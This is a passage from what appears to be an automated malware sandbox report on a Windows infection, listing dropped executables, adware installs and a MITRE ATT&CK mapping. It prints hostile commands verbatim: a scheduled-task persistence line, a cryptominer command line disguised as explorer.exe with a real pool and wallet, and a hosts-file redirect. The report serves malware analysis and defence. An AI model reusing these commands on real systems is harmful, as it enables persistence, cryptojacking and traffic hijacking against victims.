        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:4344
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7336
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:8180
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7804
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4388 -s 1568
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4592
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 804
        8⤵
        Program crash
        
        PID:5588
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 836
        8⤵
        Program crash
        
        PID:4132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 888
        8⤵
        Program crash
        
        PID:5772
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 964
        8⤵
        Program crash
        
        PID:4804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 968
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 988
        8⤵
        Program crash
        
        PID:5504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1056
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4836
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        9⤵
        Executes dropped EXE
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\is-DDCSQ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DDCSQ.tmp\setup_2.tmp" /SL5="$20202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\is-L017G.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L017G.tmp\setup_2.tmp" /SL5="$30218,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        Executes dropped EXE
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3436
    - - C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4272
      - C:\Users\Admin\AppData\Roaming\2153740.exe
        
        "C:\Users\Admin\AppData\Roaming\2153740.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4764 -s 1940
        7⤵
        Program crash
        
        PID:6656
      - C:\Users\Admin\AppData\Roaming\7283926.exe
        
        "C:\Users\Admin\AppData\Roaming\7283926.exe"
        6⤵
        
        PID:4836
      - C:\Users\Admin\AppData\Roaming\6559868.exe
        
        "C:\Users\Admin\AppData\Roaming\6559868.exe"
        6⤵
        Executes dropped EXE
        
        PID:4944
      - C:\Users\Admin\AppData\Roaming\1604829.exe
        
        "C:\Users\Admin\AppData\Roaming\1604829.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4656
      - C:\Users\Admin\AppData\Roaming\7432657.exe
        
        "C:\Users\Admin\AppData\Roaming\7432657.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4152
      - C:\Users\Admin\AppData\Roaming\7292878.exe
        
        "C:\Users\Admin\AppData\Roaming\7292878.exe"
        6⤵
        Executes dropped EXE
        
        PID:4416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3976
- C:\Users\Admin\AppData\Local\Temp\7zS49DD18D3\Fri156ec98815f89c.exe
  Fri156ec98815f89c.exe
  2⤵
  - Executes dropped EXE
  PID:4188

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5040

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4004
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4520

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6232
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6252

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6620

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:7040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
PID:6616

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6516
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8B1DF2C7772712973277D929A42707D7 C
  2⤵
  - Loads dropped DLL
  PID:7344
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FE85D11718B8F6FC8B6634498AB36C55
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:7860
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:8024
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 17A91258A1F82FD0B67B4DBE2D53D2E7 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:8068

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8124
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:8136

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:6708

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:5616
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:7976
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    PID:5452

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7608

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7668

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- NTFS ADS
PID:6508
- C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
  "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:4324
- - C:\Windows\SysWOW64\sc.exe
    sc stop FreeVPN
    3⤵
    PID:7832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "sc query "FreeVPN" | FIND /C "1060""
    3⤵
    PID:4400
  - - C:\Windows\SysWOW64\sc.exe
      sc query "FreeVPN"
      4⤵
      PID:5164
  - - C:\Windows\SysWOW64\find.exe
      FIND /C "1060"
      4⤵
      PID:4756
- - C:\Program Files (x86)\FreeVPN\search_awesome.exe
    "C:\Program Files (x86)\FreeVPN\search_awesome.exe" /S
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
    PID:7148
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Search_Awesome
      4⤵
      PID:5408
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "sc query "Search_Awesome" | FIND /C "1060""
      4⤵
      PID:6788
    - - C:\Windows\SysWOW64\sc.exe
        
        sc query "Search_Awesome"
        5⤵
        
        PID:5504
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C "1060"
        5⤵
        
        PID:7284
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" add 139.162.197.244 www.gstatic.com C:\Windows\system32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4828
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" -clean
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of SetWindowsHookEx
      PID:2292
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" -in
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2740
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -in
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:6212
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:6196
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat
      4⤵
      PID:4012
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5576
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -typ https://www.freevpn.win/download/thankyou.html?vcid=wvsgitrka6bd5k9a2fnlmb74&txid=1d86df2f0d7db69c91f537bff0172240d66300f4
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:5256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4168

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5928

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:7628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4620

C:\Program Files (x86)\Search Awesome\setup.exe
"C:\Program Files (x86)\Search Awesome\setup.exe" -svc
1⤵
- Executes dropped EXE
PID:6960

C:\Program Files (x86)\FreeVPN\FreeVPN.exe
"C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -svc
1⤵
- Executes dropped EXE
PID:3816

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:5476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7348

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7500

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5836

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
1⤵
PID:7124

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6704

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xf8
1⤵
PID:6132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5928

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery